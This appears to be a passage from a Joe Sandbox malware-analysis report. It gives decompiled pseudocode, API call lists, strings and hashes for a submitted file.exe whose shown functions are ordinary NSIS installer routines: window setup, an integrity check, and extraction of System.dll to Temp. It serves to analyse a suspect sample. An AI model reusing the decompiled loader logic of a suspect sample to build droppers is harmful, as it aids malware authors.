								__eflags =  *0x4291ec;
								if( *0x4291ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236e8, 5); // executed
							_t39 = E00406864("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406864("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291c0);
								 *0x4291e4 = _t87;
								RegisterClassW(0x4291c0);
							}
							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
							E00403B06(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a220;
						 *0x4291c4 = E00401000;
						 *0x4291d0 =  *0x42a220;
						 *0x4291d4 = _t30;
						 *0x4291e4 = 0x40a380;
						if(RegisterClassW(0x4291c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281c0;
					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
					_t63 =  *0x4281c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281c2;
						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406507(0x435800, E00405DD6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E22(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bbc
0x00403bc5
0x00403bcc
0x00403bce
0x00403be2
0x00403bf4
0x00403bfd
0x00403c06
0x00403c0d
0x00403c12
0x00403c19
0x00403c2c
0x00403c2c
0x00403c37
0x00403bd0
0x00403bdb
0x00403bdb
0x00403c3c
0x00403c4f
0x00403c54
0x00403c65
0x00403cf7
0x00403cff
0x00403d08
0x00403d08
0x00403d1e
0x00403d24
0x00403d32
0x00403db3
0x00403dbb
0x00403dc5
0x00403dca
0x00403dd0
0x00403e5a
0x00403e5f
0x00403e61
0x00403e7d
0x00000000
0x00403e7d
0x00403e63
0x00403e69
0x00403e71
0x00403e71
0x00000000
0x00403e69
0x00403dde
0x00403de9
0x00403dee
0x00403df0
0x00403df7
0x00403df7
0x00403e02
0x00403e0a
0x00403e0c
0x00403e0e
0x00403e17
0x00403e1a
0x00403e20
0x00403e20
0x00403e3f
0x00403e50
0x00000000
0x00403e55
0x00403dbd
0x00403dbf
0x00000000
0x00403d34
0x00403d34
0x00403d40
0x00403d4a
0x00403d50
0x00403d55
0x00403d64
0x00403e82
0x00403e82
0x00000000
0x00403e82
0x00403d73
0x00403dae
0x00000000
0x00403dae
0x00403c6b
0x00403c6b
0x00403c6e
0x00403c70
0x00000000
0x00000000
0x00403c7e
0x00403c90
0x00403c95
0x00403c9e
0x00000000
0x00000000
0x00403ca4
0x00403ca6
0x00403cb3
0x00403cb3
0x00403cbc
0x00403cc2
0x00403cea
0x00403cf2
0x00000000
0x00403cd4
0x00403cd5
0x00403cde
0x00403ce4
0x00403ce5
0x00000000
0x00403ce5
0x00403ce0
0x00403ce2
0x00000000
0x00000000
0x00000000
0x00403ce2
0x00403cc2

APIs

Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901

lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,76D23420), ref: 00403CB7
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CD5
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403D1E

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

RegisterClassW.USER32(004291C0), ref: 00403D5B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
RegisterClassW.USER32(004291C0), ref: 00403E20
DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F

Strings

_Nb, xrefs: 00403D3A, 00403DA2
RichEd20, xrefs: 00403DE4
Control Panel\Desktop\ResourceLocale, xrefs: 00403BEA
.exe, xrefs: 00403CC4
1033, xrefs: 00403BD6, 00403C32
Call, xrefs: 00403C7E, 00403C87, 00403C95, 00403CE4, 00403CEA
RichEdit, xrefs: 00403E11
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BBB
RichEdit20W, xrefs: 00403E02, 00403E08
RichEd32, xrefs: 00403DF2
.DEFAULT\Control Panel\International, xrefs: 00403C22

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3228750522
Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\file.exe";
				 *0x42a22c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\file.exe", 0x400);
				_t89 = E00405FF7(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406507(0x436800, _t91);
				E00406507(0x439000, E00405E22(0x436800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x420ec4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x42a234 - _t82;
					if( *0x42a234 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x403847
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034AF( *0x42a234 + 0x1c);
						_t35 =  &_v24; // 0x403847
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42a230 = _t94;
							 *0x42a238 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a23c =  *0x42a23c + 1;
								__eflags =  *0x42a23c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FB2(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034AF( *0x414eb8);
					_t65 = E00403499( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403499(0x40ceb8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a234;
						if( *0x42a234 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FB2( &_v44, 0x40ceb8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414eb8; // 0x88f43
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a234 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x420ec4; // 0x895d0
						if(__eflags < 0) {
							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
						}
						 *0x414eb8 =  *0x414eb8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fc
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031f7
0x004031fe
0x00000000
0x00000000
0x00403200
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x0040324e
0x00403251
0x00403264
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x004032ab
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x00403216
0x0040321b
0x0040321d
0x00000000
0x00000000
0x00403222
0x00403225
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403125
0x00403127
0x00403129
0x00403129
0x0040312d
0x00403132
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x0040313a
0x00403141
0x004031bd
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403152
0x00403157
0x00000000
0x00000000
0x00403159
0x00403160
0x00000000
0x00000000
0x00403162
0x00403169
0x00000000
0x00000000
0x0040316b
0x00403172
0x00000000
0x00000000
0x00403174
0x0040317b
0x00000000
0x00000000
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403195
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a3
0x004031a7
0x004031af
0x004031af
0x004031b2
0x004031b5
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x004031b7
0x004031a9
0x004031ad
0x00000000
0x00000000
0x00000000
0x004031cb
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031e6
0x004031ee
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\file.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C

Strings

soft, xrefs: 0040316B
C:\Users\user\Desktop\file.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
G8@, xrefs: 00403227, 00403242
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
Inst, xrefs: 00403162
Null, xrefs: 00403174
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Error launching installer, xrefs: 004030CD

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\file.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3351343549
Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E4D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405DD6(E00406507(_t81, 0x436000)), ??);
				} else {
					E00406507();
				}
				E0040678E(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040683D(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FD2(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405569(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E00406507("C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp", _t83);
						E00406507(_t83, _t81);
						E00406544(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406507(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp");
						_t64 = E00405B67("C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E00405569();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405569(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B67();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Strings

C:\Users\user\AppData\Local\Temp\nsv58DC.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp$C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll$Call
API String ID: 1941528284-3684881772
Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405569(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429204;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
					}
					_t27 = lstrlenW(0x4226e8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226e8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
